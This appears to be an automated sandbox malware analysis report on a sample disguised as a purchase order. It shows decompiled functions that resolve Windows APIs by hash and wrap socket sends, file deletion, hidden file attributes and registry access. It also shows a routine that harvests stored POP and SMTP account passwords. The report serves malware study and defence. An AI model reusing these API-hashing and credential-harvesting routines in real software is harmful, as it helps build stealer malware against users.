                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 37%
                      			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _t5;
                      
                      				_t5 = _a12;
                      				if(_t5 == 0) {
                      					_t5 = E00405D0B(_a8) + 1;
                      				}
                      				__imp__#19(_a4, _a8, _t5, 0); // executed
                      				return _t5;
                      			}





                      APIs
                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: send
                      • String ID:
                      • API String ID: 2809346765-0
                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                      				int _t6;
                      				void* _t7;
                      
                      				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                      				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                      				return _t6;
                      			}






                      APIs
                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileMove
                      • String ID:
                      • API String ID: 3562171763-0
                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Startup
                      • String ID:
                      • API String ID: 724789610-0
                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040427D(WCHAR* _a4) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                      				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                      				return _t4;
                      			}






                      APIs
                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00404A19(void* _a4, short* _a8, void** _a12) {
                      				long _t5;
                      				void* _t6;
                      
                      				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                      				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                      				return _t5;
                      			}






                      APIs
                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403C40(void* _a4) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                      				_t4 = FindCloseChangeNotification(_a4); // executed
                      				return _t4;
                      			}






                      APIs
                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: ChangeCloseFindNotification
                      • String ID:
                      • API String ID: 2591292051-0
                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403C08(WCHAR* _a4) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                      				_t4 = DeleteFileW(_a4); // executed
                      				return _t4;
                      			}






                      APIs
                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402C1F(WCHAR* _a4) {
                      				struct HINSTANCE__* _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                      				_t4 = LoadLibraryW(_a4); // executed
                      				return _t4;
                      			}






                      APIs
                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403BEF(void* _a4) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                      				_t4 = FindClose(_a4); // executed
                      				return _t4;
                      			}






                      APIs
                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403BB7(WCHAR* _a4) {
                      				long _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                      				_t4 = GetFileAttributesW(_a4); // executed
                      				return _t4;
                      			}






                      APIs
                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004049FF(void* _a4) {
                      				long _t3;
                      				void* _t4;
                      
                      				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                      				_t3 = RegCloseKey(_a4); // executed
                      				return _t3;
                      			}






                      APIs
                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403B64(WCHAR* _a4) {
                      				int _t3;
                      				void* _t4;
                      
                      				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                      				_t3 = PathFileExistsW(_a4); // executed
                      				return _t3;
                      			}






                      APIs
                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID:
                      • API String ID: 1174141254-0
                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: closesocket
                      • String ID:
                      • API String ID: 2781271927-0
                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403F9E(void* _a4) {
                      				int _t3;
                      				void* _t4;
                      
                      				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                      				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                      				return _t3;
                      			}





                      0x00403fac
                      0x00403fba
                      0x00403fbe

                      APIs
                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406472(long _a4) {
                      				void* _t3;
                      				void* _t4;
                      
                      				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                      				Sleep(_a4); // executed
                      				return _t3;
                      			}





                      0x0040647f
                      0x00406487
                      0x0040648a

                      APIs
                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004058EA(char* _a4, char* _a8) {
                      				char* _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                      				_t4 = StrStrA(_a4, _a8); // executed
                      				return _t4;
                      			}





                      0x004058f8
                      0x00405903
                      0x00405906

                      APIs
                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405924(WCHAR* _a4, WCHAR* _a8) {
                      				WCHAR* _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                      				_t4 = StrStrW(_a4, _a8); // executed
                      				return _t4;
                      			}





                      0x00405932
                      0x0040593d
                      0x00405940

                      APIs
                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 88%
                      			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t40;
                      				intOrPtr _t45;
                      				intOrPtr _t47;
                      				void* _t71;
                      				void* _t75;
                      				void* _t77;
                      
                      				_t72 = _a4;
                      				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                      				_t81 = _t71;
                      				if(_t71 != 0) {
                      					_push(__ebx);
                      					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                      					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                      					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                      					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                      					_v8 = _v8 & 0x00000000;
                      					_v20 = _t40;
                      					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                      					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                      					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                      					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                      					_v12 = _v12 & 0x00000000;
                      					_v32 = _t45;
                      					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                      					_t77 = _t75 + 0x50;
                      					_v36 = _t47;
                      					if(_v8 != 0 || _v12 != 0) {
                      						E00405872( *0x49f934, _t71, 1, 0);
                      						E00405872( *0x49f934, _t67, 1, 0);
                      						_t74 = _v16;
                      						E00405872( *0x49f934, _v16, 1, 0);
                      						E00405781( *0x49f934, _v40);
                      						E00405872( *0x49f934, _v20, 1, 0);
                      						_push(_v8);
                      						E00405762(_v16,  *0x49f934, _v24);
                      						E00405872( *0x49f934, _v28, 1, 0);
                      						E00405781( *0x49f934, _v44);
                      						E00405872( *0x49f934, _v32, 1, 0);
                      						_push(_v12);
                      						E00405762(_t74,  *0x49f934, _v36);
                      						_t77 = _t77 + 0x88;
                      					} else {
                      						_t74 = _v16;
                      					}
                      					E0040471C(_t71);
                      					E0040471C(_t67);
                      					E0040471C(_t74);
                      					E0040471C(_v20);
                      					E0040471C(_v24);
                      					E0040471C(_v28);
                      					E0040471C(_v32);
                      					E0040471C(_v36);
                      				}
                      				return 1;
                      			}






















                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                      • API String ID: 0-2111798378
                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0040438F
                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                      • VariantInit.OLEAUT32(?), ref: 004043C4
                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                      • VariantInit.OLEAUT32(?), ref: 00404414
                      • SysAllocString.OLEAUT32(?), ref: 00404419
                      • VariantInit.OLEAUT32(?), ref: 00404431
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                      • String ID:
                      • API String ID: 1312198159-0
                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                      Uniqueness

                      Uniqueness Score: -1.00%